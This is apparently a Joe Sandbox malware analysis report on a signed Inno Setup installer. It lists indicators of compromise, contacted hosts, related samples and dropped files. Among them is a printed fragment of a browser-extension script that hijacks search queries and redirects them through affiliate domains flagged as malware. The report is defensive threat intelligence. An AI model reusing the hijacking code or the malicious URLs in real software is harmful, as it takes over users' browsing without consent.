http://creativecommons.org/ns#	xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	false		high
https://smashaff.com/redirect?&url=	xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.dr	true	Avira URL Cloud: malware	unknown
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	false		high
https://chrome.com$https://chrome.com$https://chrome.com	$RDGU87D.exe, 00000001.00000003.914790721.00000000022D0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://smashbrowser.com/welcome2.phpO	$RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.com1R	$RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://smashbrowser.com/welcome2.phpL	$RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd	xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	false		high
https://www.remobjects.com/ps	$RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.dr	false	URL Reputation: safe	unknown
https://chrome.com9P	$RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://smashbrowser.com/welcome2.php-1	$RDGU87D.tmp, 00000004.00000003.932375476.000000000036B000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.0000000000365000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.innosetup.com/	$RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000000.917581141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, $RDGU87D.tmp.3.dr	false	URL Reputation: safe	unknown
https://www.ssl.com/repository0	$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	false		high
https://chrome.com	$RDGU87D.exe, 00000001.00000003.922235100.0000000001EB4000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.exe, 00000003.00000003.934356412.0000000001E24000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmp	false		high
https://smashbrowser.com/welcome2.phpA	$RDGU87D.tmp, 00000004.00000003.932595838.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933214226.00000000002F7000.00000004.00000001.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.000000000204D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://smashbrowser.com/welcome2.url	$RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	false		high
http://www.inkscape.org/namespaces/inkscape	xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	false		high
https://smashbrowser.com/welcome2.php2F	$RDGU87D.tmp, 00000004.00000003.932375476.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000002.933457810.000000000035E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
141.101.120.11	t.dtscout.com	European Union	13335	CLOUDFLARENETUS	false
54.39.156.32	s4.histats.com	Canada	16276	OVHFR	false
38.128.66.115	offerszzzz.click	United States	63023	AS-GLOBALTELEHOSTUS	false
142.250.203.110	clients.l.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	smashbrowser.com	European Union	13335	CLOUDFLARENETUS	false
172.217.168.77	accounts.google.com	United States	15169	GOOGLEUS	false
64.185.227.155	api4.ipify.org	United States	18450	WEBNXUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
46.105.201.240	46-105-201-240.any.cdn.anycast.me	France	16276	OVHFR	false

Private

IP
192.168.2.255
127.0.0.1

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	831395
Start date and time:	2023-03-21 13:19:26 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	$RDGU87D.exe
Detection:	MAL
Classification:	mal40.bank.winEXE@62/71@15/12
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 46.2%) Quality average: 40.9% Quality standard deviation: 46.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 1 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 8.238.189.126, 8.241.126.121, 8.248.115.254, 8.238.85.126, 8.248.147.254, 142.250.203.99, 34.104.35.123, 172.217.168.67
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, edgedl.me.gvt1.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, www.gstatic.com, wu-bg-shim.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:20:25	API Interceptor	53x Sleep call for process: $RDGU87D.tmp modified
13:20:27	API Interceptor	18x Sleep call for process: taskkill.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
141.101.120.11	http://s953497062.onlinehome.us/fixit?_recovrAccount	Get hash	malicious	Unknown	Browse
	https://gun.arsu.site/signup.php?sub=gujis&sa=D&sntz=1&usg=AOvVaw2YyL-B_7tcDvlUKNR1lBF1	Get hash	malicious	Unknown	Browse
	Your File Is Ready To Download.exe	Get hash	malicious	Unknown	Browse
	https://s3.amazonaws.com/tdgnfbrdtykmhgna1bgmhgcfrtjrcfgtmykuhfgfnfjcfhcgncgdfxhn86/9ijhgfsdgfh.html	Get hash	malicious	Unknown	Browse
	https://sdfsdfsdfsdf.nevely.click/txoxETMP	Get hash	malicious	Unknown	Browse
54.39.156.32	$RLFVMMG.exe	Get hash	malicious	Unknown	Browse
54.39.156.32	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
38.128.66.115	$RLFVMMG.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse
	Your File Is Ready To Download.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api4.ipify.org	Ze2UurUp2E.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	j1DSkpr0mb.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	Proforma_PL.xls	Get hash	malicious	AgentTesla, GuLoader	Browse	173.231.16.76
	Ziraat_Bankas#U0131_Swift_Mesaj#U0131_(8).exe	Get hash	malicious	AgentTesla, zgRAT	Browse	173.231.16.76
	DHL_Original_Shipment_Document.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	zqwioujj.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	http://go.onelink.me/107872968?pid=InProduct&c=Global_Internal_YGrowth_AndroidEmailSig__AndroidUsers&af_wl=ym&af_sub1=Internal&af_sub2=Global_YGrowth&af_sub3=EmailSignature&af_web_dp=http://hyww.15.snowrainbd.com/kw7tb2mo%20#tj_base64_encode%20aHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL2FwcGZvcmVzdF91Zi9mMTY3OTMxMjkxMDAxOXg2MjY5MTMxOTcxODkwODMxMDAvY29sZS5odG1s?em=ventas@seaboardmarine.com.ni%22	Get hash	malicious	HTMLPhisher	Browse	173.231.16.76
	file.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	T4oIN41uUE.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	PSFBGrvmxy.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	izwFjkhFJm.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	Q4YODvoYjL.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	Smh3IA9098.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	CsTapHIkAO.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	173.231.16.76
	g0PWOnCNZH.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	FeDex_shipping_document.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.155
	DHL_Shipping_Document2.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	173.231.16.76
	New_Order_M2023SI3.xls	Get hash	malicious	AgentTesla	Browse	104.237.62.211
	TT_copy.xls	Get hash	malicious	AgentTesla	Browse	173.231.16.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	mj3Lf2ulDf.exe	Get hash	malicious	Amadey, Djvu, SmokeLoader	Browse	188.114.96.3
	https://t.sidekickopen86.com/s3t/c/5/f18dQhb0V1-gmb8c7SZ_W1x1Wk359hl3kW7_k2841CX6NGW36Q28R1D8_RCVv6xCD11t9-sf197v5Y04?te=W3R5hFj4cm2zwW3Kb3pK1T_bFpW3M1YQr41TRgPW45TRgW3K2B2XW43Tw8Z4hMntNW43SfLS43T4N9W4hLywB3R5hFjW4cbjZB1mp7wVW1SbD6w4fG967W3T3qd41GF81sW4cKgQM3K7-PpW41Yswk43T3VxW2zpLjf43j6YSW1mp7y51mp7ygW3K8R4L41PFX7W1SbFxy3K3p__W3_QfJp3_X5XxW3SYLpP3T1MdGW49HRqW4cFxKwW3_m1SR2xZ8D8W43WhFN45vScwW4fykN22FY-vmW4rzN743g0nzVW3XFZV13K5WpgW4fD5rY2vLKG4W3_JkBy2zWlrXW2vMsC9327xbYW3zdyqG3H3bCkW2dLp8t2120KSW1mrcDQ2125hqW1N5bQ43JKGc-W3H4lnW3GJ6mnW1Y_53P3H3wh3W1N4mzM25fdWBW2s-jZn3DKzB-W21j9B33JH_83W1Z0NBt3H35pLW3BLCyh1Qsz5DW24MF5S1M_KB9W1M_KB91-YRkwW1X2dfL1X1P_vW1V1BHr1V0kbLW2sT8Np41WvysW1mrcFH3bbSV-W2CPrBR1VpB4NW4rk2JQ3W0hhLW2sCrVK3VG8J7W2vHnkK2sNx_mW3W0hhW1SvsLmW4thcjM2sNwHsW3SLSgN3Xw1hwW3bBdxd2sNyCPW2sN47Q41q7qZW2vsFFV1M_KB9W1mrcDQ211_TkW3_Ygfy3H3bCkW2f1gbs3jvpvFW41K4dB3XDCd4W254cSg25fkyKW2KD0x51Sby4tW3W3_m71S8SN8W2zvP9l45WvP3W3QNggB2vt6RpW45rYrc4cJ2Vxf3K2WHM04&si=8000000026898251&pi=0b755dfe-788c-4ae6-a229-0f4bcd270698	Get hash	malicious	HTMLPhisher	Browse	172.64.145.69
	https://cas5-0-urlprotect.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2f271439.cobirosite.com&umid=f16b4cf0-c742-11ed-8159-000d3a3a98a4&auth=c2a56d6141a8692d9b5d791c68c527956ffb37c9-ff3e408d549b1d6d7c46279eef2cb8bc73dd19df	Get hash	malicious	HTMLPhisher	Browse	104.21.54.42
	https://www.youtube.com/attribution_link?c=coachblog-ytm-acq-int-blog-txt-coach&u=https%3A%2F%2Fbomberosbarcelonaquindio.org%2Fnew%2Fauth%2F/itqpxu%2F%2F%2F%2Ftest.test@test.com%3Fid%3Dcom.google.android.apps.youtube.music	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Siparis_584801571.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://www.youtube.com/attribution_link?c=coachblog-ytm-acq-int-blog-txt-coach&u=https%3A%2F%2Fbomberosbarcelonaquindio.org%2Fnew%2Fauth%2F/lqnobz%2F%2F%2F%2Fmichael.giantomaso@phillyshipyard.com%3Fid%3Dcom.google.android.apps.youtube.music	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	HSBC_Payment_Advice_pdf.exe	Get hash	malicious	FormBook	Browse	172.67.153.85
	https://s3.amazonaws.com/appforest_uf/f1679316986431x498434839476354500/b33bsign.html	Get hash	malicious	HTMLPhisher	Browse	104.21.235.2
	DHL_Notice_pdf.exe	Get hash	malicious	FormBook	Browse	1.13.186.125
	oeillet.exe	Get hash	malicious	Remcos, GuLoader	Browse	162.159.134.233
	Svrz Docusign 728.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	14DQLvW18s.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	3.exe	Get hash	malicious	Unknown	Browse	172.67.130.58
	3.exe	Get hash	malicious	Unknown	Browse	104.21.3.44
	Image to PDF - PDF Maker_1.4.5_Apkpure.apk	Get hash	malicious	Unknown	Browse	104.17.24.14
	3.exe	Get hash	malicious	Unknown	Browse	104.21.3.44
	27671221_961.42167489.905779.46094.lNk.lnk	Get hash	malicious	Unknown	Browse	104.16.124.96
	Image to PDF - PDF Maker_1.4.5_Apkpure.apk	Get hash	malicious	Unknown	Browse	104.17.24.14
	Curium Pharma_Resource_Pol5641Guidelines_and_Initialing Instructions__200323.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://concur.parsfn.com	Get hash	malicious	Unknown	Browse	188.114.97.3

Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines (662), with CRLF line terminators
Category:	dropped
Size (bytes):	6986
Entropy (8bit):	4.8857905053740325
Encrypted:	false
SSDEEP:	192:s3iymZL/btGE2pRfQpxPyaGDd6M3TDsyzAr:TymZYexPWDcME
MD5:	9E14A24DABF427581BE3933A700715E6
SHA1:	2F4A29E39A69944D6A954ECCE21607F5CE8E2A1E
SHA-256:	0ADE971AE68AE6D818E9837AB8C6D4D603AC0BB3D23AA78A0F5D1B91706E155E
SHA-512:	5292B9E01C044CBBCDBB1E3A558FBA3542A577D3D54E1282282D1C13D1A10BED440D602657D25014249B74EC3F8EA1EF506C47C0C00EF01C9D7D37DD72FB3D09
Malicious:	false
Preview:	var data=['yahoo.com','p','q','https://searchesmia.com/bingchr4?q=',..'^http(s)?:\/\/(www\|search?).(google\|yahoo\|bing\|ecosia)?\.[a-z]{2,4}\/search',..'^http(s)?:\/\/(www\|search?).yahoo.com\/yhs\/search',..'duckduckgo.com/?q=','ask.com/web?','/%20/g','+','www.','&first','bing.com',..'7fk8qechol',..'popup',..'https://smashaff.com/redirect?&url=',..'www',..'amazon.com',..'colort',..'smashaff.com'..];....let tabsHistory = {};..let throughSmash = {};..let prevBing = {};....var seaDefault = new RegExp(data[4]);..var yasea = new RegExp(data[5]); ..var dusea = new RegExp(data[6]);..var asksea = new RegExp(data[7]);....function convertURL(hostname, urlParams) {.. var uri = '';.. if (hostname.indexOf(data[0]) !== -1).. uri = urlParams.get('p');.. else.. uri = urlParams.get('q');.. return data[3] + uri;.. }....try {.. chrome.tabs.onUpdated.addListener((tabId, info) => { if(data!=undefined){ .. if(info.status) {.. if(info.stat

Source: https://searchesmia.com/bingchr4?q=	Avira URL Cloud: Label: malware
Source: https://smashaff.com/redirect?&url=	Avira URL Cloud: Label: malware

Source: C:\Windows\System32\is-T05I8.tmp	ReversingLabs: Detection: 42%
Source: C:\Windows\system32\sxsshell.dll (copy)	ReversingLabs: Detection: 42%

Source: Joe Sandbox View	IP Address: 141.101.120.11 141.101.120.11
Source: Joe Sandbox View	IP Address: 38.128.66.115 38.128.66.115

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown	Network traffic detected: HTTP traffic on port 49217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 443

Process:	C:\Users\user\Desktop\$RDGU87D.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3014144
Entropy (8bit):	6.394081474330121
Encrypted:	false
SSDEEP:	49152:QLJwSihjOb6GLb4SKEs3DyOMC2DlgwccAP8SOHxVkTE0:swSi0b67zeC/wccAP85H
MD5:	4193A1BA05847842590BE08BEC38CC72
SHA1:	6A294D185949A7F8655805484FE6F6B522A8077A
SHA-256:	2ADED9B00081DD6BCB376F99AF5D5462A70C567682C425E5CA9734506058C686
SHA-512:	53ACB9B81A9CB0C8B3CD1E0E44F602378C1FAA6E1356C4CBCD3A5C625E5E18AF892BB9181E1CB3423B7548B542D23A523484483BAB25C872A94372E6493F0465
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....]_.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...0.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................

Entrypoint:	0x4b5eec
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F5DDFC3 [Sun Sep 13 09:00:51 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	5a594319a0d69dbc452e748bcf05892e

Signature Valid:	true
Signature Issuer:	CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	10/12/2022 9:50:16 AM 10/12/2023 9:48:39 AM
Subject Chain	OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=LIMESTONE DIGITAL LIMITED, SERIALNUMBER=14347919, O=LIMESTONE DIGITAL LIMITED, L=Stoke-On-Trent, C=GB
Version:	3
Thumbprint MD5:	1902CF8D0B158DA71E552DBF8A895FE1
Thumbprint SHA-1:	2AAE66915908A703D5059DA2FCF4D5245B78BB30
Thumbprint SHA-256:	D64F03F1738A5FB5B1C02AE09BDFE0D95101530EB356CBFB323AFD7C0793502A
Serial:	4D2DC3C461FF097059BC7440DAC6207B

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc4000	0x9a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2000	0xf36	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x4800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1ce598	0x2a78
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc6000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc22e4	0x244	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xc3000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb361c	0xb3800	False	0.3448639341051532	data	6.356058204328091	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xb5000	0x1688	0x1800	False	0.544921875	data	5.972750055221053	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xb7000	0x37a4	0x3800	False	0.36097935267857145	data	5.044400562007734	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xbb000	0x6de8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc2000	0xf36	0x1000	False	0.3681640625	data	4.8987046479600425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xc3000	0x1a4	0x200	False	0.345703125	data	2.7563628682496506	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
